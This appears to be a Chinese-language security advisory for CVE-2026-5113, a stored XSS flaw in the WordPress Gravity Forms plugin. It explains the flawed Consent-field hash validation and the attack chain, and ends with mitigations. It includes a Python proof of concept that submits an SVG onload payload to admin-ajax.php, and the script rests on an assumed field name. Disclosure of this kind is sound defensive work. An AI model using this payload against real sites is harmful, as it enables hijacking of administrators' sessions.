CVE-2026-5113 WordPress Gravity Forms存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2026-5113

漏洞类型

存储型跨站脚本攻击

CVSS评分

7.2 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

WordPress Gravity Forms 插件

漏洞概述

WordPress的Gravity Forms插件在2.10.0及以下版本中存在严重的存储型跨站脚本（XSS）漏洞。该漏洞源于Consent字段隐藏输入中存在缺陷的状态验证机制。由于验证逻辑存在“失效开放”问题，当输入被wp_kses()清理时，仅当原始输入和清理后输入的哈希值均与原始状态不匹配时才会失败。攻击者可以利用wp_kses()会剥离的标签（如<svg>）注入XSS载荷，恶意原始值被保留并保存到数据库中。当管理员查看条目列表页面时，存储的恶意同意标签被检索并在未转义的情况下输出，导致XSS载荷执行。未经身份验证的攻击者可利用此漏洞在管理员访问条目列表时注入任意Web脚本。

技术细节

该漏洞的核心在于Gravity Forms插件的状态验证逻辑设计缺陷。插件在处理Consent字段的隐藏输入时，会生成两个哈希值：一个是原始输入的哈希，另一个是经过wp_kses()函数（WordPress的HTML清理函数）处理后的输入哈希。验证机制仅在两个哈希值都与原始状态不匹配时才拒绝保存，这意味着只要其中一个哈希匹配，验证就会通过。

攻击者利用这一逻辑漏洞，注入包含被wp_kses()剥离的恶意标签（例如SVG标签）的XSS载荷。由于wp_kses()移除了危险标签，清理后的输入可能符合预期，导致清理后的哈希匹配验证通过。然而，插件错误地将未经清理的原始恶意值保存到了数据库中。

当管理员登录WordPress后台并访问受影响表单的Entries List（条目列表）页面时，系统会从数据库中检索这些条目。由于输出时缺乏足够的转义处理，存储在数据库中的恶意脚本代码被直接渲染在管理员浏览器中。这使得未经身份验证的攻击者能够劫持管理员会话，执行任意操作，甚至接管网站权限。

攻击链分析

STEP 1

1. 信息收集

攻击者识别出目标WordPress站点安装了Gravity Forms插件，且版本低于或等于2.10.0。

STEP 2

2. 载荷构造

攻击者构造包含XSS载荷（如<svg>标签）的特制数据，旨在绕过wp_kses()的清理但触发验证逻辑漏洞。

STEP 3

3. 恶意提交

攻击者未经身份验证向表单的Consent字段提交恶意数据。由于验证逻辑缺陷，原始恶意数据被保存到数据库。

STEP 4

4. 触发执行

当管理员登录后台查看“条目列表”页面时，系统读取未转义的恶意数据并渲染，导致XSS载荷在管理员浏览器中执行。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def exploit(target_url, form_id):
    """
    PoC for CVE-2026-5113
    Exploits Stored XSS in Gravity Forms via Consent field.
    """
    # Target endpoint usually handles AJAX submissions or standard form posts
    submit_url = f"{target_url}/wp-admin/admin-ajax.php"
    
    # Payload using <svg> which gets stripped by wp_kses but raw value is saved
    # due to the flawed hash validation logic.
    xss_payload = '<svg/onload=alert(document.cookie)>'
    
    data = {
        "action": "gform_submit",
        "form_id": form_id,
        # Assuming input_1 is the vulnerable consent field ID
        "input_1": xss_payload, 
        "is_submit_1": "1"
    }
    
    try:
        response = requests.post(submit_url, data=data)
        if response.status_code == 200:
            print(f"[+] Payload sent to {target_url}")
            print("[*] Check the Entries List page as an admin to trigger XSS.")
        else:
            print(f"[-] Failed to send payload. Status code: {response.status_code}")
    except Exception as e:
        print(f"Error: {e}")

if __name__ == "__main__":
    # Replace with actual target details
    exploit("http://localhost/wordpress", "1")

影响范围

Gravity Forms <= 2.10.0

防御指南

临时缓解措施

如果无法立即升级插件，建议暂时禁用Gravity Forms插件中的Consent字段功能，或者使用Wordfence等安全插件添加防火墙规则以拦截针对该漏洞的攻击尝试。同时，应加强对表单提交数据的监控，并提醒管理员不要轻易点击来源不明的条目详情。